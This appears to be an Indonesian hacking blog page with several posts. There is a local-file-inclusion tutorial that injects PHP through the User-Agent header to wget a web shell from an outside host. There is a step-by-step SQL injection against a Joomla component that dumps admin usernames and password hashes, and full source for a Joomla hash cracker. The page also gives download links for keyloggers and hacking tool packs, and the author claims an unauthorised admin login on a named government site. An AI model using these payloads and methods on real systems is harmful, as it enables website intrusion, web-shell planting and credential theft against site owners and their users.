Silahkan download di sini …

http://hotfile.com/dl/25115438/d19f10f/bt.DVD.part01.rar.html

http://hotfile.com/dl/25115968/18fa8e5/bt.DVD.part02.rar.html

http://hotfile.com/dl/25116314/b963c46/bt.DVD.part03.rar.html

http://hotfile.com/dl/25116591/fab11bb/bt.DVD.part04.rar.html

http://hotfile.com/dl/25116915/2882182/bt.DVD.part05.rar.html

http://hotfile.com/dl/25117144/6f25cef/bt.DVD.part06.rar.html

http://hotfile.com/dl/25117442/205cd46/bt.DVD.part07.rar.html

http://hotfile.com/dl/25117654/12cb72b/bt.DVD.part08.rar.html

http://hotfile.com/dl/25117920/2b12f8b/bt.DVD.part09.rar.html

http://hotfile.com/dl/25118192/276ee91/bt.DVD.part10.rar.html

http://hotfile.com/dl/25118474/0a1c516/bt.DVD.part11.rar.html

http://hotfile.com/dl/25118886/dac42cc/bt.DVD.part12.rar.html

http://hotfile.com/dl/25119320/9a494df/bt.DVD.part13.rar.html

http://hotfile.com/dl/25124466/f426200/bt.DVD.part14.rar.html

http://hotfile.com/dl/25125403/c4bd091/bt.DVD.part15.rar.html

http://hotfile.com/dl/25126157/7c34a43/bt.DVD.part16.rar.html

http://hotfile.com/dl/25126892/6b2b305/bt.DVD.part17.rar.html

http://hotfile.com/dl/25127791/d516701/bt.DVD.part18.rar.html

http://hotfile.com/dl/25128566/e155665/bt.DVD.part19.rar.html

http://hotfile.com/dl/25129145/24ea2b2/bt.DVD.part20.rar.html

http://hotfile.com/dl/25129668/ce706b8/bt.DVD.part21.rar.html

http://hotfile.com/dl/25130322/08fa8bb/bt.DVD.part22.rar.html

http://hotfile.com/dl/25130962/8c4d9a7/bt.DVD.part23.rar.html

http://hotfile.com/dl/25131616/28a9ef2/bt.DVD.part24.rar.html

http://hotfile.com/dl/25132156/c3fb6cc/bt.DVD.part25.rar.html

http://hotfile.com/dl/25132903/d6d8232/bt.DVD.part26.rar.html

http://hotfile.com/dl/25133491/8dd5f2c/bt.DVD.part27.rar.html

http://hotfile.com/dl/25134062/365b929/bt.DVD.part28.rar.html

http://hotfile.com/dl/25134551/d52aa9a/bt.DVD.part29.rar.html

http://hotfile.com/dl/25135308/3aa5284/bt.DVD.part30.rar.html

http://hotfile.com/dl/25135898/135bc05/bt.DVD.part31.rar.html

http://hotfile.com/dl/25136466/9f68bbc/bt.DVD.part32.rar.html

http://hotfile.com/dl/25136722/1492995/bt.DVD.part33.rar.html

Dalam tutorial hacking kali ini saya akan coba mengimplementasikan bagaimana membuat shell pada target server lewat LFI dengan metode proc/self/environ, hal ini telah dibahas  sebelumnya di website milw0rm pada paper ke 361.
Ok kita langsung saja…

1. Hal yang pertama dilakukan seperti teknik-teknik lainnya adalah kita terlebih dahulu coba temukan website yang vulnerable terhadap serangan LFI.

contoh : http://site.com/info.php?file=news.php

2. coba kita ganti “news.php” dengan “../../../”.

contoh : http://site.com/info.php?file=../../../

lalu kita mendapat error, seperti berikut…

Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

ok sepertinya, kita mendapat kesempatan untuk memanfaatkan include ke file lain.
selanjutanya kita coba temukan /etc/passwd.

contoh : http://site.com/info.php?file=etc/passwd
Tetapi kita masih mendapat error seperti berikut :

Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

bagaimana jika kita naikan directorynya ?
mari kita coba…

contoh : http://site.com/info.php?file=../../../../../../../../../etc/passwd

Ahoi, kita berhasil mendapatkan file /etc/passwd yang terlihat seperti berikut :

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
saned:x:106:113::/home/saned:/bin/false
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:117::/var/run/dbus:/bin/false
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false
gunslinger:x:1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash
snmp:x:112:65534::/var/lib/snmp:/bin/false
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin

3. mari kita check apakah /proc/self/environ bisa kita akses ?
sekarang, ganti “/etc/passwd” dengan “/proc/self/environ”

contoh : http://site.com/info.php?file=../../../../../../../../../proc/self/environ

Jika anda mendapatkan yang seperti ini :

DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac
HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD= GET REQUEST_URI = /index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/gunslinger/public_html/index.php SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com SERVER_NAME=www.site.com
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80

Ternyata proc/self/environ dapat kita akses !
jika anda mendapatkan halaman yang kosong (blank) /proc/self/environ tidak dapat di akses atau mungkin juga beroperating system *BSD

4. Sekarang mari kita injeksi dengann malicious kode dengan meracuni http-headernya . bagaimana kita bisa menginjeksinya? kita bisa menggunakan tamper data pada firefox addon.
dapat anda download disini : https://addons.mozilla.org/en-US/firefox/addon/966
buka tamper data di firefox lalu masukan url /proc/self/environ yang tadi “http://site.com/info.php?file=../../../../../../../../../proc/self/environ”
lalu pada user-agent isikan dengan kode berikut :

<?system(‘wget http://r57.gen.tr/c100.txt -O shell.php’);?>

atau

<?exec(‘wget http://r57.gen.tr/c100.txt -O shell.php’);?>

lalu submit.

5. jika kita berhasil menginjeksi malicious kode berikut, maka shell akan ada di tempat seperti ini.

http://www.site.com/shell.php

happy hacking !

Kepada para admin, rajin-rajinlah mempatch sistem anda.

Lain kali penulis akan coba membahas lebih dalam mengenai Metasploit Framework, bagi anda yang ingin mengunduh dan mencoba untuk bersenang-senang dengan database metasploit yang terbaru silahkan langsung kunjungi website offisialnya http://www.metasploit.com/framework/download/

Toolsnya antara lain Netcat, Nessus, Tripwire, John the Ripper, and the Forensic Toolkit. Silahkan di unduh disini …

http://www.megaupload.com/?d=G5HJ37DC

• 128 Bit Wep Cracking With Injection!.swf
• A Penetration Attack Reconstructed.avi
• A Quick and Dirty Intro to Nessus using the Auditor Boot CD!.swf
• Adding Modules to a Slax or Backtrack Live CD from Windows.swf
• Airplay replay attack – no wireless client required.swf
• Anonym.OS LiveCD with build in Tor Onion routing and Privoxy.swf
• BackTrack LiveCD to HD Installation Instruction Video .swf
• Basic Nmap Usage!.swf
• Basic Tools for Wardriving!.swf
• Bluesnarfer attack tool demonstration.swf
• Bluesnarfing a Nokia 6310i hand set.avi
• Breaking WEP in 10 minutes.avi
• Cain to ARP poison and sniff passwords!.avi
• Complete Hacking Video using Metasploit – Meterpreter.swf
• Cracking a 128 bit WEP key (Auditor).swf
• Cracking a 128 Bit Wep key + entering the cridentials.swf
• Cracking Syskey and the SAM on Windows Using Samdump2 and John!.swf
• Cracking Windows Passwords with BackTrack and the Online Rainbow Tables at Plain-Text!.swf
• Cracking WPA Networks (Auditor).swf
• DoS attack against Windows FTP Server – DoS.avi
• Droop s Box Simple Pen-test Using Nmap, Nikto, Bugtraq, Nslookup and Other Tools!.swf
• Exploiting some bugs of tools used in Windows.swf.swf
• Exploiting weaknesses of PPTP VPN (Auditor).swf
• Finding Rogue SMB File Shares On Your Network!.swf
• Fun with Ettercap Filters!.swf
• How to cura the local windows passwords in the SAM database .swf
• How to decrypt SSL encrypted traffic using a man in the middle attack (Auditor).swf
• How to sniff around switches using Arpspoof and Ngrep!.avi
• Install VNC Remotely!.avi
• Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Hi-Res).avi
• Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Lo-Res).avi
• John The Ripper 1.7 password cracker Installation Instruction Video .swf
• Local Password Cracking Presentation for the Indiana Higher Education Cybersecurity Summit 2005!.swf
• MAC Bridging with Windows XP and Sniffing!.swf
• Mass De-Authentication using void11 (Auditor).swf
• Metasploit Flash Tutorial!.swf
• MITM Hijacking.wmv
• Nmap Video Tutorial 2 Port Scan Boogaloo!.swf
• Sniffing logins and passwords.avi
• Sniffing Remote Router Traffic via GRE Tunnels (Hi-Res).avi
• Sniffing Remote Router Traffic via GRE Tunnels (Lo-Res).avi
• Sniffing VoIP Using Cain!.swf
• Snort Instruction video – howto install into backtrack.swf
• SSH Dynamic Port Forwarding!.swf
• Start a session and get interactive commandline access to a remote Windows box!.avi
• Telnet Bruteforce.avi
• Tunneling Exploits through SSH.avi
• Use Brutus to cura a box running telnet!.avi
• Using NetworkActiv to sniff webpages on a Wi-Fi network!.swf
• WEP Cracking using Aireplay v2.2 Beta 7 (Whax 3.0).swf
• WMF File Code Execution Vulnerability With Metasploit!.swf
• WPA Cracking using Aireplay v2.2 Beta 7 (Whax 3.0).swf

Silahkan di download di sini :
http://rapidshare.com/files/230824983/Huge_Collection_Of_Hacking_Videos.part1.rar
http://rapidshare.com/files/230825083/Huge_Collection_Of_Hacking_Videos.part2.rar
http://rapidshare.com/files/230825048/Huge_Collection_Of_Hacking_Videos.part3.rar
http://rapidshare.com/files/230824882/Huge_Collection_Of_Hacking_Videos.part4.rar
http://rapidshare.com/files/230824795/Huge_Collection_Of_Hacking_Videos.part5.rar
http://rapidshare.com/files/230824916/Huge_Collection_Of_Hacking_Videos.part6.rar
http://rapidshare.com/files/230824692/Huge_Collection_Of_Hacking_Videos.part7.rar

Bagi anda yang kesulitan untuk mendownload video tersebut, sudah kami sertakan dalam CD Hacking v.3 ( 3 DVD ).

http://rapidshare.com/files/174700524/Cr4k.h4ck.Tut.part1.rar
http://rapidshare.com/files/174700648/Cr4k.h4ck.Tut.part2.rar
http://rapidshare.com/files/174700526/Cr4k.h4ck.Tut.part3.rar
http://rapidshare.com/files/174700610/Cr4k.h4ck.Tut.part4.rar
http://rapidshare.com/files/174700440/Cr4k.h4ck.Tut.part5.rar
http://rapidshare.com/files/174700301/Cr4k.h4ck.Tut.part6.rar

Segera CD Hacking v.3 @ ilmuwebsite.com

Ada beberapa keylogger yang cukup menarik, diantaranya ada yang dapat mengirim hasil dari monitoring aktivitas tersebut ke email sang penanam keylogger tersebut. Sehingga si penanam keylogger tersebut dapat melihat semua aktivitas yang dilakukan oleh user pada sebuah pc melalui email.
Jelas keylogger ini bersifat kontroversial seperti 2 mata pisau, positif, negatif, membangun dan menghancurkan. Tidak cukup waktu untuk mendiskusikan semua hal tersebut.
Untuk menambah koleksi hacking tools anda, silahkan unduh 63 keylogger terbaru  yang cukup handal …

Berikut daftarnya :
1. 007 Keylogger Spy Software 3.873
2. Active Key Logger 2.4
3. Activity Keylogger 1.80.21
4. Activity Logger 3.7.2132
5. ActMon Computer Monitoring 5.20
6. Actual Spy 2.8
7. Advanced Invisible Keylogger v1.9
8. Advanced Keylogger 1.8
9. Ardamax Keylogger 2.9
10. BlazingTools Perfect Keylogger 1.68
11. Blazingtools Remote Logger v2.3
12. Data Doctor KeyLogger Advance v3.0.1.5
13. Local Keylogger Pro 3.1
14. ExploreAnywhere Keylogger Pro 1.7.8
15. Family Cyber Alert 4.06
16. Family Keylogger 2.80
17. Firewall bypass Keylogger 1.5
18. Free Keylogger 2.53
19. Ghost Keylogger 3.80
20. Golden Eye 4.5
21. Golden KeyLogger 1.32
22. Handy Keylogger 3.24 build 032
23. Home Keylogger 1.77
24. Inside Keylogger 4.1
25. iOpus Starr PC and Internet Monitor 3.23
26. iSpyNow v2.0
27. KeyScrambler 1.3.2
28. Keystroke Spy 1.10
29. KGB Keylogger 4.2
30. KGB Spy 3.84
31. LastBit Absolute Key Logger 2.5.283
32. Metakodix Stealth Keylogger 1.1.0
33. Network Event Viewer v6.0.0.42
34. OverSpy v2.5
35. PC Activity Monitor Professional 7.6.3
36. PC Spy Keylogger 2.3 build 0313
37. PC Weasel 2.5
38. Personal PC Spy v1.9.5
39. Power Spy 6.10
40. Powered Keylogger v2.2.1.1920
41. Quick Keylogger 2.1
42. Radar 1.0
43. Real Spy Monitor 2.80
44. Real Spy Monitor 2.80
45. Remote Desktop Spy 4.04
46. Remote KeyLogger 1.0.1
47. Revealer Keylogger Free 1.33
48. SC Keylogger Pro 3.2
49. Smart Keystroke Recorder Pro
50. Spector Pro 6.0.1201
51. SpyAnytime PC Spy 2.42
52. SpyBuddy 3.7.5
53. Spytech SpyAgent 6.02.07
54. Spytector 1.3.5
55 Stealth Key Logger 4.5
56. System keylogger 2.0.0
57. Tim’s Keylogger 1.0
58. Tiny Keylogger 2.0
59. Total Spy 2.7
60. Windows Keylogger 5.04
61. Win-Spy Pro 8.9.109
62. XP Advanced Keylogger 2.5
63. XPCSpy Pro version 3.01

Mohon maaf, sementara link 63 keylogger di suspend terlebih dahulu, sampai kami upload ulang semua keyloggernya ke server local, sebagai gantinya silahkan mencoba keylogger yang tidak kalah powerfull http://hotfile.com/dl/91905/3eb88a2/Beyond.Keylogger.v3.1.Multilenguaje.Incl.KeyMaker.and.Patch-DVT.rar.html

Waha… sepertinya intro tutorial harus dipisahkan sendiri dalam tutorial yang berbeda, jari penulis begitu asik menari-nari di atas tuts keyboard sampai-sampai lupa pada pokok pembahasan. .

Ya, berdasarkan artikel sebelumnya, betapa mudahnya seorang attacker mendapatkan username dan password sang administrator pada content management system seperti joomla, tapi masih terdapat satu masalah,  dimana seorang attacker masih belum dapat melakukan eksploitasi lebih lanjut, dikarenakan password yang didapatkan itu masih dalam bentuk password yang terenkripsi, sehingga butuh perlakuan khusus lebih lanjut untuk mendapatkan password yang sesungguhnya. Di sinilah penulis akan mencoba menjelaskan sebuah konsep sederhana bagaimana mendapatkan suatu password asli yang terenkripsi, namun penulis hanya membatasi cracking password pada satu jenis hash saja, yaitu joomla hash password. Penjelasan yang akan penulis lakukan bukanlah mencoba membuat algoritma dekripsi password tetapi hanyalah penggunaan metode dictionary file, dimana untuk mendapatkan password asli cukup dilakukan pencocokan password dengan kamus data yang ada sehingga menghasilkan password yang sebenarnya. . Namun setiap aplikasi selalu saja memiliki kekurangan, penulis tidak menafikan hal itu. Karena kesempurnaan hanyalah milik sang Pencipta. Kekurangannya adalah resource memori yang di butuhkan untuk metode seperti ini cenderung lebih besar dari ukuran biasanya.

Berikut adalah source code lengkap ‘simple joomla password cracker’ :

———————–// cut here

<HTML>
<HEAD>
<BASEFONT SIZE=3>
<TITLE>::: Joomla Password Cracker :::</TITLE>

</HEAD>

<BODY BGCOLOR=#000000 vlink=#0000FF>

<center>
<p align=”center”><font face=”Verdana” size=”1″><BR>
</B><BR>
  </font></p>
<p align=”center”> </p>
<p align=”center”> </p>
<TABLE BORDER=0 WIDTH=500 CELLPADDING=3 CELLSPACING=0>
<tr><td> <p align=”center” style=”margin-top: 0″><font color=”#FFFFFF” face=”Verdana” size=”2″><u><font size=”4″>Simple</font></u>
</font><font size=”4″><u><font face=”Verdana” color=”#00FF00″><strong>Joomla</strong></font> <font color=”#FFFFFF” face=”Verdana”>Password Cracker</font></u></font><font size=”2″><font color=”#FFFFFF” face=”Verdana”><br>
<font color=”#00FF00″>Developed by<strong> : ilmuwebsite.com </strong></font></font></font></p>
    </td>
</tr>
</table>
<!–  Demonstration –>
<BODY>
<center>
  <form action=index.php method=”POST”><p>
    <P>
<b>
<font size=”2″ face=”Verdana” color=”#FFFFFF”><u>Masukkan  </u></font></b><u><font size=”2″ face=”Verdana” color=”#FFFFFF”>password hashnya disini :</font></u><font size=”2″ face=”Verdana” color=”#FFFFFF”></font><font color=”#00FF00″ size=”1″ face=”Verdana”><br>
<BR>
<input type=”text” name=”hash” size=55 style=”font-family: Verdana; font-size: 8pt; color: #00FF00; border: 1px solid #00FF00; background-color: #000000″>
<input type=”submit” name=”send” value=”Cari !!!” style=”font-family: Verdana; font-size: 8pt; color: #00FF00; border: 1px solid #00FF00; background-color: #000000″>
</font>
<P><br>

</form>
 
<?php
$hashes=array();
$i=0;
$parts=explode(“:”,$_POST['hash']);
$hashes[$i][0]=$parts[0];   
$hashes[$i][1]=$parts[1];

if (ISSET($_POST['hash']))
{
$str = ” “;
echo “<font size=2 face=Verdana color=#FFFFFF><u>Started: </u>”;
echo date(“F j, Y, g:i:s a”);

$lines = file(‘kamus2.txt’);

foreach ($lines as $line_num => $line)
{
check($line);
}

$lines = file(‘kamus1.txt’);

foreach ($lines as $line_num => $line)
{
check($line);
}

echo “<br><font size=2 face=Verdana color=#FFFFFF><u>Finished : </u>”;
echo date(“F j, Y, g:i:s a”);

}

function check($a)
{     
global  $i;
$a=rtrim($a) ;

for($x=0;$x<=$i;$x++)
{
global  $hashes;

if (md5($a.$hashes[$x][1]) === $hashes[$x][0])
{
echo “<font size=2 face=Verdana color=#FFFFFF><br><br><u>The password is : </u></font><font size=2 face=Verdana color=#00FF00><h1>$a</h1></font>”;
echo “<u>Ended: </u>”;
echo date(“F j, Y, g:i:s a”);
}

}
          
}
?>
<font size=”2″ face=”Verdana” color=”#FFFFFF”><u><br><br>Tolong di kembangkan ya ?! </u></font>
</center>
</body></html>

———————–// cut here

Untuk menjalankan script ini di localhost anda perlu merubah konfigurasi php.ini, yaitu dengan mengganti baris ini :
memory_limit = 32M ;

menjadi > 32, penulis menggantinya menjadi :
memory_limit = 256M ;

Ya, sebelum berlanjut, penulis akan membahas struktur password joomla yang terenkripsi terlebih dahulu, enkripsi password joomla biasanya terdiri dari hash dan salt.  Standar enkripsi joomla biasanya berbentuk seperti ini :

b51498faae03f7cf533e3ed97fc00116:9VrQpQzdNQHhtieK

Hashnya itu terdapat pada bagian yang pertama yaitu b51498faae03f7cf533e3ed97fc00116, dan saltnya itu ada di bagian akhir 9VrQpQzdNQHhtieK, keduanya terlihat di pisahkan dengan titik dua “:”. Salt bagi seorang attacker berfungsi untuk membantu dalam pencarian password sesungguhnya.
Yang ditemukan disini adalah jika password berbentuk plain text di gabung dengan saltnya maka akan menghasilkan hash password joomla. Dengan kata lain jika : x + salt = hash joomla. Sehingga jika di implementasikan melalui enkripsi md5 :

md5(x + salt) = hash  

maka :

md5(x + 9VrQpQzdNQHhtieK) = b51498faae03f7cf533e3ed97fc00116

berapakah x ? ( pak Mamat guru matematika di SMAN 4 Bogor kayanya tau. huehuehuehehe…  )

Ya seperti pada baris kalimat ini :

…
if (md5($a.$hashes[$x][1]) === $hashes[$x][0])
{
echo “<font size=2 face=Verdana color=#FFFFFF><br><br><u>The password is : </u></font><font size=2 face=Verdana color=#00FF00><h1>$a</h1></font>”;
…

Dan hasilnya adalah …

~~

Penulis yakin anda cukup familiar dengan source di atasnya. Dan algoritmanya pun cukup mudah. Script lengkap dan kamus passwordnya dapat di download di sini …
Selamat mencoba. Selamat mengembangkan !

Greetz for : b_scorpio, peterpanz, abuzahra, phii_, nazwa, jojo, ivan, fadli, safril, dr.emi, husniearif, [H], dan ilmuwebsite community.

Penulis akan menjelaskan betapa mudahnya sebuah web dieksploitasi hanya dengan bermodalkan internet dan browser internet tentunya, dan sedikit pengetahuan sql query. Perlu penulis jelaskan, penulis hanyalah seorang manusia biasa yang memiliki pengetahuan minimal dari sistem keamanan data.

Ya, belum lama ini, salah satu component joomla terbukti mengidap penyakit berbahaya, tumor ganas yang akan menjalar keseluruh tubuh, dan berakibat kematian pada akhirnya. ~~

Telah ditemukan bug sql injection pada com_ds-syndicate, ini adalah salah satu contoh dari sekian banyak bug fatal yang terdapat dalam joomla. Waspadalah! Kesalahan terjadi karena komponen ini tidak menyediakan filtering sql yang ketat dalam variable feed_id. Penyusupan dapat dilakukan, sederhananya ini terjadi karena kesalahan dari variable feed_id. Dan saat menulis artikel ini ada beberapa site masih memiliki kecacatan seperti ini. 

Ya, Langsung aja …

http:// korban.com/index2.php?option=ds-syndicate&version=1&feed_id=1

Url ini menampilkan feeds seperti biasanya, tapi beda halnya jika kita tes kelemahannya, dengan penambahan tanda kutip ( ‘ ) di belakangnya.

http:// korban.com/index2.php?option=ds-syndicate&version=1&feed_id=1′

Apa yang terjadi ? … error…

Langkah selanjutnya adalah cari urutan  si table ‘dssyndicate_feeds’  dengan mendapatkan bentuk error yang sama, dan berhenti ketika mendapatkan error yang berbeda  :

index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+1/*    –>    errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+2/*    –>    errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+3/*    –>    errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+4/*    –>    errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+20/*    –>    errornya sama
…
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+21/*    –>    errornya berbeda

perhatikan bentuk error-nya berbeda ketika feed_id yang diisi dengan 1+order+by+21/*, ini adalah patokan untuk melakukan injeksi sql yang selanjutnya.

Langkah selanjutnya adalah penggunaan union, lebih jelasnya mengenai fungsi union, silahkan baca di sini.

Selanjutnya kita test, apakah fungsi union dapat berjalan pada url korban.
index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,
15,16,17,18,19,20+from+wc_users

lihat paling akhir dari baris tersebut,
from+wc_users

wc_users adalah nama table yang diambil dari struktur database joomla. Berisi mengenai informasi login user.
Sedangkan 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ini  diperoleh berdasarkan yang telah penulis jelaskan sebelumnya.

Ya setelah url di atas di enter, yang perlu dilakukan adalah mendownload file tersebut,

Setelah itu buka file yang baru didownload tersebut dengan editor seperti notepad, walaupun filenya xml, tapi penulis tetap menyarankan untuk membukanya dengan notepad, tidak dengan browser internet, karena memudahkan untuk pembacaan hasil dari sql injection yang telah dilakukan.

Lihat angka 2 di dalam tag <title> :

<title>2 (18)</title>

Jangan pedulikan angka (18) di belakangnya, yang perlu diperhatikan adalah angka 2-nya. Ini berarti berdasarkan hasil query union menggunakan browser tadi, anda dapat menggunakan angka 2 tersebut untuk keperluan selanjutnya. Seperti mengganti angka 2 dengan kumpulan karakter lain untuk menggunakannya seperti melihat versi mysql yang digunakan, ya langsung saja, kita akan mencobanya untuk melihat versi mysql yang digunakan oleh si korban. Gunakan url ini …

http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from
+wc_users

perhatikan angka 2 diganti dengan kalimat @@version, enter, kemudian buka kembali file telah di download dengan notepad, apa yang terjadi ? title berubah menjadi versi si mysql, yang penulis dapatkan :

<title>5.0.33 (18)</title>

Mysql versi 5.0.33 , sampai sini anda telah dapat eksplorasi database user dengan leluasa. Apa yang dilakukan seorang attacker selanjutnya ? ya, mendapatkan username dan password si admin. .

Pengambilan username dan password secara paksa menggunakan sql injection ini dapat dilakukan secara satu persatu, ataupun sekaligus. Query untuk menampilkan username menggunakan bug sql injection yang satu ini, anda cukup mengganti @@version yang tadi dengan field yang menyimpan informasi username tentunya, gunakan url ini :

http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
username,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+wc_users

jalankan url, download filenya, kemudian buka kembali dengan notepad. Hasilnya adalah username dari database tersebut …

<title>admin (18)</title>

Atau bisa juga ditampilkan informasi username, password, email, dan user_type sekaligus, gunakan url seperti ini :

http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
concat(username,0x3a,password,0x3a,email,0x3a,usertype),3,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+wc_users

perhatikan, string username, diganti dengan concat(username,0x3a,password,0x3a,email,0x3a,usertype), penggunaan concat disini adalah mengconvert suatu hexa, ataupun spesial karakter kedalam bentuk ascii, sehingga, yang terjadi nantinya adalah :

0x3a berubah menjadi titik dua ( : ), buka kembali file hasil dari url di atas. Yang penulis dapatkan adalah informasi seperti ini :

admin:bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK:alkemail@gmail.com:Super Administrator

Jika di urutkan :
Username : admin
Password ( hash ) : bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK
Email : alkemail@gmail.com
User type : Super Administrator

Yang di lakukan selanjutnya adalah mencoba crack password, karena itu masih dalam bentuk hash, dengan kata lain password yang masih terenkripsi.  . Yups, pengambilan username dan password secara paksa telah terjadi, si attacker kembali mencari cara bagaimana mendapatkan password yang asli, dengan cara mengcrack password hash tersebut.

Inilah bukti begitu mudahnya suatu web diambil alih oleh attacker, akibat dari seorang admin yang malas melakukan patch pada systemnya.

Di artikel selanjutnya penulis akan menjalankan konsep sederhana password crack untuk joomla menggunakan php. Tunggu kelanjutannya … .

Untuk keperluan eksperimen, silahkan download filenya di sini.
http://joomlacode.org/gf/download/frsrelease/6828/22538/Joomla_1.0.15-Stable-Full_Package.zip
http://www.unair.info/ilmuwebsite/hack/joomla/com_ds-syndicate.tar.gz

greetz : b_scorpio bisnis semen, staff ilmuwebsite yang pada ngurus skripsinya
Peterpanz yang kerepotan ngurus skripsi juga , mr.freeman, for jojo too, najwa[at]STSN, dr.emi, denice the manace, Phii_, fadli

Dan siapa sangka script php yang telah dibuat itu aman  dari kerentanan dalam masalah security. ~~~

Lalu, bagaimana mencegah sang hacker mengekploitasi,  bahkan merusak website anda, bagaimana mencegah secara pasti dan mengetahui  script yang telah dibuat memiliki bug yang fatal, bagaimana menangani itu semua  ?? 
 

Penulis akan mencoba untuk memberikan sedikit penjelasan,  bug yang sering dijumpai dalam aplikasi berbasis web khususnya Content  Management system maupun yang lainnya. Di antaranya :

- XSS ( Cross Site Scripting )
- SQL Injection
- RFI ( Remote File Inclusion )

Cross Site Scriping
Lebih dikenal dengan sebutan XSS. Kesalahan ini terjadi  karena tidak adanya filtering pada html maupun java script.
 
Tetapi pada dasarnya defacing ( perubahan kontent ) hanya  terjadi disisi client saja. Yang paling fatal dari bug ini adalah anda dapat  mencuri cookie  kemudian menggunakannya  untuk berbuat sesuatu yang … ~~
 
Contohnya :
Sensored [ maaf ]

SQL Injection
SQL Injection sebenarnya terjadi karena seorang attacker  yang mencoba melakukan inject query sql   melalui form ataupun via address bar pada browser internet.  Sebagai contohnya ketika penulis mencoba login  sebagai admin pada situs pemerintah Sumatra Selatan ( http://www.sumsel.go.id  ).  Dengan menggunakan query ‘ or 1=1–  penulis pun berhasil login. Pada dasarnya ‘ atau single quote dan or 1=1– itu  berfungsi untuk membingungkan si server sql, sehingga yang dilakukan oleh  server sql adalah menjalankan query ” select * “. Yang terjadi adalah  penulis diloloskan untuk login sebagai admin.
   
Berikut adalah gambar yang penulis capture ketika penulis  berhasil login sebagai admin pada situs http://www.sumsel.go.id

Gambar ini diambil sebelum penulis mengontak webmaster  via email untuk mempatch script phpnya.
   
RFI ( Remote File Inclusion )
